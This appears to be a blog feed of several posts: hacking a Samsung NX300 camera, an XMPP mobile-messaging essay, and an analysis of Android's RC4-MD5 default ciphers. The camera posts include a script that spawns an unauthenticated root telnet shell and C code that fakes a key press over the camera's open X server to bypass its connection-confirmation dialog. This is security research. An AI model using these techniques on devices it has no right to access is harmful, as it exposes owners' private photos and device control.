144    2652   188 Ss    dbus-daemon --system
181    3416   772 Ss    /usr/bin/power_manager
232   12268  4608 S<s+  /usr/bin/Xorg :0 -logfile /opt/var/log/Xorg.0.log -ac -noreset \
    -r +accessx 0 -config /usr/etc/X11/xorg.conf -configdir /usr/etc/X11/xorg.conf.d
243    2988    76 Ss    init      
244    2988    56 Ss    init      
245    2988    60 Ss+   init      
246    2988    56 Ss+   init      
247    2988     8 S     sh /usr/etc/X11/xinitrc
256   20200  2336 S      \_ /usr/bin/enlightenment -profile samsung \
254   19876     8 S     /usr/bin/launchpad_preloading_preinitializing_daemon
255   12648   816 S     /usr/bin/ac_daemon
259    3600     8 S     dbus-launch --exit-with-session /usr/bin/enlightenment -profile samsung \
260    2652     8 Ss    /usr/bin/dbus-daemon --fork --print-pid 5 --print-address 7 --session
267  690688 34760 Ssl   di-camera-app-nx300
404    2988   520 S      \_ sh -c /mnt/mmc/
405    2988   552 S          \_ /bin/sh /mnt/mmc/
408    2860   996 R              \_ ps axfu

Our script is executed by di-camera-app-nx300, there is enlightenment and dbus running, and i-really-know-what-i-am-doing-and-accept-full-responsibility-for-it.

The mount point list looks pretty standard as well for an embedded device, using UBIFS for flash memory and the exfat driver for the SD card:

rootfs on / type rootfs (rw)
ubi0!rootdir on / type ubifs (ro,relatime,bulk_read,no_chk_data_crc)
devtmpfs on /dev type devtmpfs (rw,relatime,size=47096k,nr_inodes=11774,mode=755)
none on /proc type proc (rw,relatime)
tmpfs on /tmp type tmpfs (rw,relatime)
tmpfs on /var/run type tmpfs (rw,relatime)
tmpfs on /var/lock type tmpfs (rw,relatime)
tmpfs on /var/tmp type tmpfs (rw,relatime)
tmpfs on /var/backups type tmpfs (rw,relatime)
tmpfs on /var/cache type tmpfs (rw,relatime)
tmpfs on /var/local type tmpfs (rw,relatime)
tmpfs on /var/log type tmpfs (rw,relatime)
tmpfs on /var/mail type tmpfs (rw,relatime)
tmpfs on /var/opt type tmpfs (rw,relatime)
tmpfs on /var/spool type tmpfs (rw,relatime)
tmpfs on /opt/var/log type tmpfs (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
/dev/ubi2_0 on /mnt/ubi2 type ubifs (ro,noatime,nodiratime,bulk_read,no_chk_data_crc)
/dev/ubi1_0 on /mnt/ubi1 type ubifs (rw,noatime,nodiratime,bulk_read,no_chk_data_crc)
/dev/mmcblk0 on /mnt/mmc type exfat (rw,nosuid,nodev,noatime,nodiratime,uid=5000,gid=6,fmask=0022,

Remote Access

The camera does not connect to your WiFi network by default; you have to launch one of the WiFi apps first. The most reliable one for experimenting in your (protected) home network is the Email app. After you launch it, the camera looks for WiFi networks (configure your own one here), and stays connected for a long time, keeping the X server (and anything you started from your script) running.

After tinkering around with a static dropbear binary downloaded from the Internets (and binary-patching the references to dropbear_rsa_host_key and authorized_keys), I ran into a really silly problem:

[443] May 09 12:00:45 user 'root' has blank password, rejected

Running a Telnet Server

Around the same time, I realized one thing that I should have checked first:

lrwxrwxrwx    1    17 May 22  2013 /usr/sbin/telnetd -> ../../bin/busybox

Our firmware comes with busybox, and busybox comes with telnetd - an easy-to-deploy remote login service. After that realization settled, the first attempt looked like we had almost made it:

georg@megavolt:~$ telnet nx300
Connected to nx300.local.
Escape character is '^]'.
Connection closed by foreign host.

georg@megavolt:~$ telnet nx300
telnet: Unable to connect to remote host: Connection refused

Wow, the telnet port was open, something was running, but we crashed it! Another two mount-edit-restart-mount cycles later, the issue was clear:

telnetd: can't find free pty

Fortunately, the solution is documented. Now we can log into the camera for sure?

georg@megavolt:~$ telnet nx300
Connected to nx300.local.
Escape character is '^]'.

*                 SAMSUNG LINUX PLATFORM                   *

nx300 login: root
Login incorrect

Damn, Samsung! Why no login? Maybe we can circumvent this somehow? Does the busybox telnetd help output provide any hints?

    -l LOGIN        Exec LOGIN on connect

Maybe we can replace the evil password-demanding login command with... a shell? Let us adapt our SD card script to what we have gathered:


#!/bin/sh
mkdir -p /dev/pts
mount -t devpts none /dev/pts

telnetd -l /bin/bash -F > /mnt/mmc/telnetd.log 2>&1 &

Another mount-edit-restart cycle, and we are in:

georg@megavolt:~$ telnet nx300
Connected to nx300.local.
Escape character is '^]'.

*                 SAMSUNG LINUX PLATFORM                   *

nx300:/# cat /proc/cpuinfo
Processor       : ARMv7 Processor rev 8 (v7l)
BogoMIPS        : 1395.91
Features        : swp half thumb fastmult vfp edsp neon vfpv3 tls 
CPU implementer : 0x41
CPU architecture: 7
CPU variant     : 0x2
CPU part        : 0xc09
CPU revision    : 8

Hardware        : Samsung-DRIMeIV-NX300
Revision        : 0000
Serial          : 0000000000000000
nx300:/# free
         total       used       free     shared    buffers     cached
Mem:        512092     500600      11492          0        132      41700
-/+ buffers/cache:     458768      53324
Swap:        30716       8084      22632
nx300:/# df -h /
Filesystem                Size      Used Available Use% Mounted on
ubi0!rootdir            352.5M    290.8M     61.6M  83% /
nx300:/# ls -al /opt/sd0/DCIM/100PHOTO/
total 1584
drwxr-xr-x    2 root     root           520 May 22  2013 .
drwxr-xr-x    3 root     root           232 May 22  2013 ..
-rwxr-xr-x    1 root     root        394775 May 22  2013 SAM_0015.JPG
-rwxr-xr-x    1 root     root        335668 May 22  2013 SAM_0016.JPG   [Obama was here]
-rwxr-xr-x    1 root     root        357591 May 22  2013 SAM_0017.JPG
-rwxr-xr-x    1 root     root        291493 May 22  2013 SAM_0018.JPG
-rwxr-xr-x    1 root     root        232470 May 22  2013 SAM_0019.JPG

Congratulations, you have gained network access to yet another Linux appliance! From here, you should be able to do anything you want with the camera, except for the interesting things locked inside the Samsung binaries.

Comments on HN

Full series:

Posted 2014-05-12 18:05:26 Tags:

The Samsung NX300 smart camera is a middle-class mirrorless camera with NFC and WiFi connectivity. You can connect it with your local WiFi network to upload directly to cloud services, share pictures via DLNA or obtain remote access from your smartphone. For the latter, the camera provides the Remote Viewfinder and MobileLink modes where it creates an unencrypted access point with wide-open access to its X server and any data which you would expect only to be available to your smartphone.

Because hardware engineers suck at software security, nothing else was to be expected. Nevertheless, the following will show how badly they suck, if only for documentation purposes.

This post is only covering the network connectivity of the NX300. Read the follow-up posts for getting a root shell and adding features to the camera. The smartphone app deserves some attention as well. Feel free to do your own research and post it to the project wiki.

The findings in this blog post are based on firmware version 1.31.


The NFC "connectivity" is an NTAG203 created by NXP, which is pre-programmed with an NDEF message to download and launch the (horribly designed) Samsung SMART CAMERA App from Google Play, and to inform the app about the access point name provided by this individual camera:

Type: MIME: application/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX

Payload: com.samsungimaging.connectionmanager

The tag is writable, so a malicious user can easily "hack" your camera by rewriting its tag to download some evil app, or to open nasty links in your web browser, merely by touching it with an NFC-enabled smartphone. This was confirmed by replacing the tag content with a URL.

The deployed tag supports permanent write-locking, so if you know a prankster nerd, you might end up with a camera stuck redirecting you to a hardcore porn site.

WiFi Networking

You can configure the NX300 to join your WiFi network, where it behaves like a regular client with some open services, like DLNA. Let us see what exactly is offered by performing a port scan:

megavolt:~# nmap -sS -O nx300

Starting Nmap 6.25 ( ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.local (
Host is up (0.0089s latency).
Not shown: 999 closed ports
6000/tcp open  X11
MAC Address: A0:21:95:**:**:** (Unknown)
No exact OS matches for host (If you know what OS is running on it, see ).

This scan was performed while the "E-Mail" application was open. In AllShare Play and MobileLink modes, 7676/tcp is opened in addition. Further, in Remote Viewfinder mode, the camera also opens 7679/tcp.

X Server

Wait, what? X11 as an open service? Can that be true? Surely it is at least access-locked via TCP to prevent abuse?

georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts

georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
   480x800        60.0*+
HDMI1 disconnected (normal left inverted right x axis y axis)

georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
Defaulting to search window name, class, and classname
Enlightenment Background
Enlightenment Black Zone (0)

Enlightenment Frame
Enlightenment Frame

Nope! This is really an unprotected X server! It is running Enlightenment! And we can even run apps on it! But besides displaying stuff on the camera the fun seems very limited:

NX300 xteddy

X11 Key Bindings

A short investigation using xev outlines that the physical keys on the camera body are bound to X11 key events as follows:

  • On/Off: XF86PowerOff (only when turning off)
  • Scroll Wheel: XF86ScrollUp / XF86ScrollDown
  • Direct Link: XF86Mail
  • Mode Wheel: F1 .. F10
  • Video Rec: XF86WebCam
  • +/-: XF86Reload
  • Menu: Menu
  • Fn: XF86HomePage
  • Keypad: KP_Left .. KP_Down, KP_Enter
  • Play: XF86Tools
  • Delete: KP_Delete

WiFi Client: Firmware Update Check

When the camera goes online, it performs a firmware version check. First, it issues the following HTTP request:


GET / HTTP/1.1
Content-Type: text/xml;charset=utf-8
Accept: application/x-shockwave-flash, application/, */*
Accept-Language: ko
User-Agent: Mozilla/4.0


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content-Length: 7
Connection: keep-alive

200 OK

This really looks like a no-op. But maybe this is a backdoor to allow for remote code execution? Who knows...

Then, a second query returns an empty document, but carries your location data (apparently derived from your IP address) in the response headers:

X-ConnMan-Status: online
X-ConnMan-Client-IP: ###.###.##.###
X-ConnMan-Client-Address: ###.###.##.###
X-ConnMan-Client-Continent: EU
X-ConnMan-Client-Country: DE
X-ConnMan-Client-Region: ##
X-ConnMan-Client-City: ###### (my actual city)
X-ConnMan-Client-Latitude: ##.166698
X-ConnMan-Client-Longitude: ##.666700
X-ConnMan-Client-Timezone: Europe/Berlin

Wow! They know where I live! At least they do not transmit any unique identifiers with the query.

As the last step, the camera is asking for firmware versions and gets redirected to an XML document with the ChangeLog.

WiFi Access Point: UPnP/DLNA

Two of the on-camera apps (MobileLink, Remote Viewfinder) open an unencrypted access point named AP_SSC_NX300_0-XX:XX:XX (where XX:XX:XX is the device part of its MAC address). Fortunately, Samsung's engineers were smart and added a user confirmation dialog to the camera UI, to prevent remote abuse:

NX300 Access Confirmation

Unfortunately, this dialog is running on a wide-open X server, so all we need to do is fake a KP_Return key event (based on an example by bharathisubramanian), and we can connect with any client, stream a live video or download all the private pictures from the SD card, depending on the enabled mode:

#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/extensions/XTest.h>
#include <X11/keysym.h>
#include <unistd.h>

/* Send Fake Key Event */
static void SendKey (Display * disp, KeySym keysym, KeySym modsym)
{
 KeyCode keycode = 0, modcode = 0;
 keycode = XKeysymToKeycode (disp, keysym);
 if (keycode == 0) return;
 XTestGrabControl (disp, True);
 /* Generate modkey press */
 if (modsym != 0) {
  modcode = XKeysymToKeycode (disp, modsym);
  XTestFakeKeyEvent (disp, modcode, True, 0);
 }
 /* Generate regular key press and release */
 XTestFakeKeyEvent (disp, keycode, True, 0);
 XTestFakeKeyEvent (disp, keycode, False, 0);

 /* Generate modkey release */
 if (modsym != 0)
  XTestFakeKeyEvent (disp, modcode, False, 0);

 XSync (disp, False);
 XTestGrabControl (disp, False);
}

/* Main Function */
int main ()
{
 Display *disp = XOpenDisplay (NULL);
 if (disp == NULL) return 1;
 sleep (1);
 /* Send Return to confirm the connection dialog */
 SendKey (disp, XK_Return, 0);
 XCloseDisplay (disp);
 return 0;
}

DLNA Service: Remote Viewfinder

The DLNA service exposes some camera features, which are queried and used by the Android app. The device's friendly name is [Camera]NX300, as can be queried via HTTP from http://nx300:7676/smp_2_:

  <manufacturer>Samsung Electronics</manufacturer>
  <modelDescription>Samsung Camera DMS</modelDescription>
  <serialNumber>20081113 Folderview</serialNumber>

Additional SOAP services are provided for changing settings like focus and flash (/smp_3_):

BrowseObjectID, BrowseFlag, Filter, StartingIndex, RequestedCount, SortCriteria, Result, NumberReturned, TotalMatches, UpdateID

Another service is available for picture / video streaming (/smp_4_):

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">

After triggering the right commands, a live video stream should be available from http://nx300:7679/livestream.avi. However, a brief attempt to get some video with wget or mplayer failed.

Firmware "Source Code"

The "source code" package provided on Samsung's OSS Release Center is 834 MBytes compressed and mainly contains three copies of the rootfs image (400-500MB each), and then some scripts. The actual build root is hidden under the second paper sheet link in the "Announcements" column.

Also, there are Obamapics in TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO.

The project is built on an ancient version of Tizen, on which I am no expert. Somebody else needs to take this stuff apart, make a proper build environment, or port OpenWRT to it.

Comments on HN

Full series:

Posted 2014-05-07 18:45:42 Tags:

In a post from 2009 I described why XEP-0198: Stream Management is very important for mobile XMPP clients and which client and server applications support it. I have updated the post over the years with links to bug tracker issues and release notes to keep track of the (still rather sad) state of affairs. Short summary:

Servers supporting XEP-0198 with stream resumption: Prosody IM.

Clients supporting XEP-0198 with stream resumption: Gajim, yaxim.

Today, with the release of yaxim 0.8.7, the first mobile client actually supporting the specification is available! There is also a public XMPP server (based on Prosody) specifically configured to integrate easily with yaxim.

Now is a good moment to recapitulate what we can get from this combination, and where the (mobile) XMPP community should be heading next.

So I have XEP-0198, am I good now?

Unfortunately, it is still not that easy. With XEP-0198, you can resume the previous session within some minutes after losing the TCP connection. While you are gone, the server will continue to display you as "online" to your contacts, because the session resumption is transparent to all parties.

However, if you have been gone for too long, it is better to inform your contacts about your absence by showing you as "offline". This is accomplished by destroying your session, making a later resumption impossible. It is a matter of server configuration how much time passes until that happens, and it is an important configuration trade-off. The longer you appear as "online" while actually being gone, the more frustration might accumulate in your buddy about your lack of reaction – on the other hand, if the session is terminated too early and your client reconnects right after that, all the state is gone!

Now what exactly happens to messages sent to you when the server destroys the session? In Prosody, all messages pending since you disconnected are destroyed and error responses are sent back. This is perfectly legal per XEP-0198, but a better solution would be to store them offline for later transmission.

However, offline storage is only useful if you are not connected with a different client at the same time. If you are, should the server redirect the messages to the other client? What if it already got them by means of carbon copies? How is your now-offline mobile client going to see that it missed something?

Even though XEP-0198 is a great step towards mobile messaging reliability, additional mechanisms need to be implemented to make XMPP really ready for mass-market usage (and users).

Entering Coverage Gaps

With XEP-0280: Message Carbons, all messages you send and receive on your desktop are automatically also copied to your mobile client, if it is online at that time. If you have a client like yaxim, that tries to stay online all the time and uses XEP-0198 to resume as fast as possible (on a typical 3G/WiFi change, this takes less than five seconds), you can have a completely synchronized message log on desktop and mobile.

However, if your smartphone is out of coverage for more than some minutes, the XEP-0198 session is destroyed, no message carbons are sent, and further messages are redirected to your desktop instead. When the mobile client finally reconnects, all it receives is suspicious silence.

XMPP was not designed for modern-day smartphone-based instant messaging. However, it is the best tool we have to counter the proprietary silo-based IM contenders like WhatsApp, Facebook Chat or Google Hangouts.

Therefore, we need to seek ways to provide the same (or a better) level of usability, without sacrificing the benefits of federation and open standards.

Message Synchronization

With XEP-0136: Message Archiving there is an arcane, properly over-engineered draft standard to allow a client to fetch collections of chat messages using a kind of version control system.

An easier, more modern approach is presented in XEP-0313: Message Archive Management (MAM). With MAM, it is much easier to synchronize the message log between a client and a server, as the server extends all messages sent to the client with an <archived> tag and an ID. Later it is easily possible to obtain all messages that arrived since then by issuing a query with the last known archive ID.

Now it is up to the client implementors to add support for MAM! So far, it has been implemented in the web-based OTalk client; more will probably follow.

End-to-End Encryption

In the light of last year's revelations, it should be clear to everybody that end-to-end encryption is an essential part of any modern IM suite. Unfortunately, XMPP is not there yet. The XMPP Ubiquitous Encryption Manifesto is a step into the right direction, enforcing encryption of client-to-server connections as well as server-to-server connections. However, more needs to be done to protect against malicious server operators and sniffing of direct client-to-client transmissions.

There is Off-The Record Messaging (OTR), which provides strong encryption for chat conversations, and at the same time ensures (cryptographic) deniability. Unfortunately, cryptographic deniability provably does not save your ass. The only conclusion from that debacle can be: do not save any logs. This imposes a strong conflict of interest on Android, where the doctrine is: save everything to SQLite in case the OOM killer comes after you.

The other issue with OTR over XMPP (which some claim is solved in protocol version 3) is managing multiple (parallel) logins. OTR needs to keep the state of a conversation (encryption keys, initialization vectors and the like). If your chat buddy suddenly changes from a mobile device to the PC, the OTR state machine is confused, because that PC does not know the latest state. The result is, your conversation degrades into a bidirectional flood of "Can't decrypt this" error messages. This can be solved by storing the OTR state per resource (a resource is the unique identifier for each client you use with your account). This fix must be incorporated into all clients, and such things tend to take time. Ask me about adding OTR to yaxim next year.

Oh, by the way. OTR also does not mix well with archiving or carbons!

There is of course also PGP, which also provides end-to-end encryption, but requires you to store your key on a mobile device (or have a separate key for it). PGP can be combined with all kinds of archiving/copying mechanisms, and you could even store the encrypted messages on your device, requiring an unlock whenever you open the conversation. But PGP is rather heavy-weight, and there is no easy key exchange mechanism (OTR excels here with the Socialist Millionaire approach).

Encrypted Media

And then there are lolcats1. The Internet was made for them. But the XMPP community kind-of missed the trend. There is XEP-0096: File Transfer and XEP-0166: Jingle to negotiate a data transmission between two clients. Both protocols allow negotiating in-band or proxy-based data transfers without encryption. "In-band" means that your multimedia file is split into handy chunks of at most 64 kilobytes each, base64-encoded, and sent via your server (and your buddy's server), causing significant processing overhead and possibly triggering rate limiting on the server. However, if you trust your server administrator(s), this is the most secure way to transmit a file in a standards-compliant way.

You could use PGP to manually encrypt the file, send it using one of the mentioned mechanisms, and let your buddy manually decrypt the file. Besides the usability implications (nobody will use this!), it is a great and secure approach.

But usability is a killer, and so of course there are some proposals for encrypted end-to-end communication.


The browser developers did it right with WebRTC. You can have an end-to-end encrypted video conference between two friggin' browsers! This must have rung some bells, and JSON is cool, so there was a proposal to stack JSON on top of XMPP for end-to-end encryption. Obviously, because security is not complicated enough on its own.

XMPP Extensions Graveyard

Then there are ESessions, a deferred XEP from 2007, and Jingle-XTLS, which didn't even make it into an XEP, but looks promising otherwise. Maybe somebody should implement it, just to see if it works.

Custom Extensions

In the OTR specification v3, there is an additional mechanism to exchange a key for symmetric data encryption. This can be used to encrypt a file transmission or stream, in a non-standard way.

This is leveraged by CryptoCat, which is known for its security. CryptoCat is splitting the file into chunks of 64511 bytes (I am sure this is completely reasonable for an algorithm working on 16-byte blocks, so it needs to be applied 4031.9375 times), with the intention to fit them into 64KB transmission units for in-band transmission. AES256 is used in CTR mode and the transmissions are secured by HMAC-SHA512.

In ChatSecure, the OTR key exchange is leveraged even further, stacking HTTP on top of OTR on top of XMPP messages (on top of TLS on top of TCP). This might allow for fast results and a high degree of (library) code reuse, but it makes the protocol hard to understand, and in-the-wild debugging even harder.

A completely different path is taken by Jitsi, where Jingle VoIP sessions are protected using Phil Zimmermann's ZRTP encryption scheme. Unfortunately, this mechanism does not transfer to file exchange.

And then iOS...

All the above only works on devices where you can keep a permanent connection to an XMPP server. Unfortunately, there is a huge walled garden full of devices that fail this simple task2. On Apple iOS, background connections are killed after a short time, the app developer is "encouraged" to use Apple's Push Service instead to notify the user of incoming chat messages.

This feature is so bizarre that you cannot even count on the OS to launch your app when a "ping" message is received; you need to send all the content you want displayed in the user notification as part of the push payload. That means that as an iOS IM app author, you have the choice between sacrificing privacy (clear-text chat messages sent to Apple's "cloud") or usability (displaying an opaque notification along the lines of "Somebody sent you a message with some content, tap here to open the chat app to learn more").

And to add insult to injury, this mechanism is inherently incompatible with XMPP. If you write an XMPP client, your users should have the free choice of servers. However, as a client developer you need to centrally register your app and your own server(s) for Apple's push service to work.

Therefore, the iOS XMPP clients divide into two groups. In the first group there are apps that do not use Apple Push, that maintain your privacy but silently close the connection if the phone screen is turned off or another app is opened.

In the second group, there are apps that use their own custom proxy server, to which they forward your XMPP credentials (yes, your user name and password! They better have good privacy ToS). That proxy server then connects to your XMPP server and forwards all incoming and outgoing messages between your server and the app. If the app is killed by the OS, the proxy sends notifications via Apple Push, ensuring transparent functionality. Unfortunately, your privacy falls by the wayside, leaving a trail of data both with the proxy operators and Apple.

So currently, iOS users wishing for XMPP have the choice between broken security and broken usability – well done, Apple! Fortunately, there is light at the end of the tunnel. The oncoming train is an XEP proposal for Push Notifications (slides with explanation). It aims at separating the XMPP client, server, and push service tasks. The goal is to allow an XMPP client developer to provide their own push service, which the client app can register with any XMPP server. After the client app is killed, the XMPP server will inform the push service about a new message, which in turn informs Apple's (or any other OS vendor's) cloud, which in turn sends a push message to the device, which the user then can use to re-start the app.

This chain reaction is not perfect, and it does not solve the message-content privacy issue inherent to cloud notifications, but it would be a significant step forward. Let us hope it will be specified and implemented soon!


So we have solved connection stability (except on iOS). We know how to tackle synchronization of the message backlogs between mobile and desktop clients. Client connections are encrypted using TLS in almost all cases, server-to-server connections will follow soon (GMail, I am looking at you!).

End-to-end encryption of individual messages is well-handled by OTR, once all clients switch to storing the encryption state per resource. Group chats are out of luck currently.

The next big thing is to create an XMPP standard extension for end-to-end encryption of streaming data (files and real-time), to properly evaluate its security properties, and to implement it into one, two and all the other clients. Ideally, this should also cover group chats and group file sharing (e.g. on top of XEP-0214: File Repository and Sharing plus XEP-0329: File Information Sharing).

If we can manage that, we can also convince all the users of WhatsApp, Facebook and Google Hangouts to switch to an open protocol that is ready for the challenges of 2014.

Comments on HN

  1. lolcats, porn, or whatever other kind of multimedia content you want transmitted from one place to another. For the sake of this discussion, streaming content is considered as "multimedia" as much as the transmission of image, video or other files. ↩

  2. the Apple fanboy will object that this is a feature and not a bug, because it prevents evil apps from eating the device battery in the background. I am sure it is a feature indeed – one intended to route all your IM traffic through an infinite loop. ↩

Posted 2014-01-30 18:20:29 Tags:


Android is using the combination of horribly broken RC4 and MD5 as the first default cipher on all SSL connections. This impacts all apps that did not care enough to change the list of enabled ciphers (i.e. almost all existing apps). This post investigates why RC4-MD5 is the default cipher, and why it replaced better ciphers which were in use prior to the Android 2.3 release in December 2010.


Some time ago, I was adding secure authentication to my APRSdroid app for Amateur Radio geolocation. While debugging its TLS handshake, I noticed that RC4-MD5 is leading the client's list of supported ciphers and thus wins the negotiation. As the task at hand was about authentication, not about secrecy, I did not care.

However, following speculations about what the NSA can decrypt, xnyhps' excellent post about XMPP clients (make sure to read the whole series) brought it back into my focus, and I seriously asked myself what led to this default.

Status Quo Analysis

First, I fired up Wireshark, started yaxim on my Android 4.2.2 phone (CyanogenMod 10.1.3 on a Galaxy Nexus) and checked the Client Hello packet sent. Indeed, RC4-MD5 was first, followed by RC4-SHA1.


To quote from RFC 2246: "The CipherSuite list, passed from the client to the server in the client hello message, contains the combinations of cryptographic algorithms supported by the client in order of the client's preference (favorite choice first)." Thus, the server is encouraged to actually use RC4-MD5 if it is not explicitly forbidden by its configuration.

I dug out my legacy devices and cross-checked Android 2.2.1 (CyanogenMod 6.1.0 on an HTC Dream), 2.3.4 (Samsung original ROM on a Galaxy SII) and 2.3.7 (CyanogenMod 7 on a Galaxy 5):

[Table: default cipher suite lists of Android 2.2.1, Android 2.3.4/2.3.7, and Android 4.2.2/4.3, side by side]

As can be seen, Android 2.2.1 came with a set of AES256-SHA1 ciphers first, followed by 3DES and AES128. Android 2.3 significantly reduced security by removing AES256 and putting the broken RC4-MD5 in the prominent first place, followed by the not-much-better RC4-SHA1.

Wait... What?

Yes, Android versions before 2.3 were using AES256 > 3DES > AES128 > RC4, and starting with 2.3 it was: RC4 > AES128 > 3DES. Also, the recently broken MD5 suddenly became the favorite MAC (Update: MD5 in TLS is less of a problem than it sounds, as it is only used inside the HMAC construction, which is not affected by the known collision attacks).

As Android 2.3 was released in late 2010, speculations about the NSA pouring money on Android developers to sabotage all of us poor users arose immediately. I needed to do something, so I wrote a minimal test program (APK, source) and single-stepped it to find the origin of the default cipher list.

It turned out to be in Android's libcore package, NativeCrypto.getDefaultCipherSuites() which returns a hardcoded String array starting with "SSL_RSA_WITH_RC4_128_MD5".

Diving Into the Android Source

Going through that file's change history revealed interesting things: the addition of TLS v1.1 and v1.2 and their almost immediate removal with a suspicious commit message (taking place between Android 4.0 and 4.1, possible reasoning), added support for Elliptic Curves and AES256 in Android 3.x, and finally the addition of our hardcoded string list sometime before Android 2.3:

 public static String[] getDefaultCipherSuites() {
-       int ssl_ctx = SSL_CTX_new();
-       String[] supportedCiphers = SSL_CTX_get_ciphers(ssl_ctx);
-       SSL_CTX_free(ssl_ctx);
-       return supportedCiphers;
+        return new String[] {
+            "SSL_RSA_WITH_RC4_128_MD5",
+            "SSL_RSA_WITH_RC4_128_SHA",
+            "TLS_RSA_WITH_AES_128_CBC_SHA",
+        };

The commit message tells us: We now have a default cipher suite list that is chose to match RI behavior and priority, not based on OpenSSLs default and priorities. Translated into English: before, we just used the list from OpenSSL (which was really good), now we make our own list... with blackjack! ...and hookers! with RC4! ...and MD5!

The test suite comes with another hint:

// Note these are added in priority order as defined by RI 6 documentation.

That RI 6 for sure has nothing to do with MI 6, but stands for Reference Implementation, the Sun (now Oracle) Java SDK version 6.

So what the fine Google engineers did to reduce our security was merely to copy what was there, defined by the inventors of Java!

Cipher Order in the Java Runtime

In the Java reference implementation, the code responsible for creating the cipher list is split into two files. First, a priority-ordered set of ciphers is constructed in the CipherSuite class:

// Definition of the CipherSuites that are enabled by default.
// They are listed in preference order, most preferred first.

add("SSL_RSA_WITH_RC4_128_MD5", 0x0004, --p, K_RSA, B_RC4_128, N);
add("SSL_RSA_WITH_RC4_128_SHA", 0x0005, --p, K_RSA, B_RC4_128, N);

Then, all enabled ciphers with sufficient priority are added to the list for CipherSuiteList.getDefault(). The cipher list has not experienced relevant changes since the initial import of Java 6 into Hg, when the OpenJDK was brought to life.

Going back in time reveals that even in the 1.4.0 JDK, the first one incorporating the JSSE extension for SSL/TLS, the list was more or less the same:

[Table: default cipher suite lists of Java 1.4.0 (2002), Java 1.4.2_19/1.5.0 (2004), and Java 1.6 (2006), side by side]

The original list resembles the CipherSpec definition in RFC 2246 from 1999, sorted numerically with the NULL and 40-bit ciphers moved down. Somewhere between the first release and 1.4.2, DES was deprecated, TLS was added to the mix (bringing in AES) and MD5 was pushed in front of SHA1 (which makes one wonder why). After that, the only change was the addition of TLS_EMPTY_RENEGOTIATION_INFO_SCSV, which is not a cipher but just an information token for the server.

Java 7 added Elliptic Curves and significantly improved the cipher list in 2011, but Android is based on JDK 6, making the effective default cipher list over 10 years old now.


The cipher order on the vast majority of Android devices was defined by Sun in 2002 and taken over into the Android project in 2010 as an attempt to improve compatibility. RC4 is considered problematic since 2001 (remember WEP?), MD5 was broken in 2009.

The change from the strong OpenSSL cipher list to a hardcoded one starting with weak ciphers is either a sign of horrible ignorance, security incompetence or a clever disguise for an NSA-influenced manipulation - you decide! (This was before BEAST made the other ciphers in TLS less secure in 2011 and RC4 gained momentum again)

All that notwithstanding, now is the time to get rid of RC4-MD5, in your applications as well as in the Android core! Call your representative on the Google board and let them know!

Appendix A: Making your app more secure

If your app is only ever contacting your own server, feel free to choose the best cipher that fits into your CPU budget! Otherwise, it is hard to give generic advice for an app that must support a wide variety of different servers without producing obscure connection errors.

Update: Server-Side Changes

The cipher priority order is defined by the client, but the server has the option to override it with its own. Server operators should read the excellent best practices document by SSLLabs.

Changing the client cipher list

For client developers, I am recycling the well-motivated browser cipher suite proposal written by Brian Smith at Mozilla, even though I share Bruce Schneier's scepticism about EC cryptography. The following is a subset of Brian's ciphers that are supported on Android 4.2.2; the last three ciphers are named SSL_ instead of TLS_ (Warning: BEAST ahead!).

// put this in a place where it can be reused
static final String ENABLED_CIPHERS[] = {
    // ... (Brian's cipher suite names, elided here) ...
};

// get a new socket from the factory
SSLSocket s = (SSLSocket)sslcontext.getSocketFactory().createSocket(host, port);
// IMPORTANT: set the cipher list before calling getSession(),
// startHandshake() or reading/writing on the socket!
s.setEnabledCipherSuites(ENABLED_CIPHERS);

Use TLS v1.2!

By default, TLS version 1.0 is used, and the more recent protocol versions are disabled. Some servers used to be broken when contacted via TLS v1.2, so this seemed a good conservative choice over a year ago.

At least for XMPP, an attempt to enforce TLS v1.2 is being made. You can follow suit in your own app easily:

// put this in a place where it can be reused
static final String ENABLED_PROTOCOLS[] = {
        "TLSv1.2", "TLSv1.1", "TLSv1"
};

// put this right before setEnabledCipherSuites()!
s.setEnabledProtocols(ENABLED_PROTOCOLS);

Use NetCipher!

NetCipher is an Android library made by the Guardian Project to improve network security for mobile apps. It comes with a StrongTrustManager to do more thorough certificate checks, an independent Root CA store, and code to easily route your traffic through the Tor network using Orbot.

Use AndroidPinning!

AndroidPinning is another Android library, written by Moxie Marlinspike to allow pinning of server certificates, improving security against government-scale MitM attacks. Use this if your app is made to communicate with a specific server!

Use MemorizingTrustManager!

MemorizingTrustManager by yours truly is yet another Android library. It allows your app to ask the user if they want to trust a given self-signed/untrusted certificate, improving support for regular connections to private services. If you are writing an XMPP client or a private cloud sync app, use this!

Appendix B: Apps that do care

Android Browser

Checks of the default Android Browser revealed that at least until Android 2.3.7 the Browser was using the default cipher list of the OS, participating in the RC4 regression.

As of 4.2.2, the Browser comes with a longer, better, stronger cipher list.


Update: Surprisingly, the Android WebView class (tested on Android 4.0.4) is also using the better ciphers.

Update: Google Chrome

The Google Chrome browser (version 30.0.1599.82, 2013-10-11) serves its own cipher list.


This one comes with AES256-GCM and SHA384! Good work, Google! Now please go and make these the default for the Android runtime!

Update: Firefox

Firefox Browser for Android (version 24.0 from F-Droid) comes with its own cipher suite list as well. However, contrary to Chrome, it is missing the GCM ciphers that would mitigate the BEAST attack.


My favorite pick from that list: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA.

Enabling TLSv1.2 does not change the cipher list. BEAST is mitigated in TLSv1.2, but the Lucky13 attack might still bite you.

Send In Your App!

